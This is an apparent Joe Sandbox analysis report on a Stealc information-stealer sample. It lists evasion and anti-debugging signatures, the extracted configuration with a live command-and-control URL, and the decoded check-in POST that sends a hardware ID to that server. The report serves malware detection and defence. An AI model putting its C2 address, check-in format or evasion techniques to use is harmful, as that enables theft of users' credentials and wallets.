Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561849
MD5:5ef73b409c0a81b7d80cce15a2e83ad9
SHA1:6ddd5bf03db3c5402469a7f3f443f27f2566ba3b
SHA256:005bb039d2c317340f5e0d3177d85559ccb63c3a722058833d824635069c4c4a
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3012 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5EF73B409C0A81B7D80CCE15A2E83AD9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2046460649.0000000004ED0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 3012JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 3012JoeSecurity_StealcYara detected StealcJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T13:39:01.001087+010020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.20680TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.3012.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00304C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00304C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003240B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003240B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003060D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00316960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00316960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_0030EA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00309B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00309B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00316B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_00316B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00309B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00309B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00307750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00307750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00313910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00313910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0031E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00311269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00311269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00311250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00311250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00314B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00314B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00312390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00312390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0030DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0030DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0031CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0031DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0031D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003016A0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 32 38 34 38 44 46 41 39 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 2d 2d 0d 0a Data Ascii: ------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="hwid"972848DFA9442409657292------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="build"mars------GDBKJDGIJECFIEBFIDHC--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00304C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_00304C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBKJDGIJECFIEBFIDHCHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 32 38 34 38 44 46 41 39 34 34 32 34 30 39 36 35 37 32 39 32 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 4b 4a 44 47 49 4a 45 43 46 49 45 42 46 49 44 48 43 2d 2d 0d 0a Data Ascii: ------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="hwid"972848DFA9442409657292------GDBKJDGIJECFIEBFIDHCContent-Disposition: form-data; name="build"mars------GDBKJDGIJECFIEBFIDHC--
              Source: file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php)
              Source: file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
              Source: file.exe, 00000000.00000002.2087381883.000000000106F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpD
              Source: file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpK
              Source: file.exe, 00000000.00000002.2087381883.0000000001066000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpg
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00309770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,memset,Sleep,CloseDesktop,0_2_00309770

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003248B00_2_003248B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B18C90_2_006B18C9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059688A0_2_0059688A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0032B1000_2_0032B100
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B69D80_2_006B69D8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005E53580_2_005E5358
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C0BE30_2_006C0BE3
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00619C530_2_00619C53
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00692CB80_2_00692CB8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00647D8B0_2_00647D8B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BD6240_2_006BD624
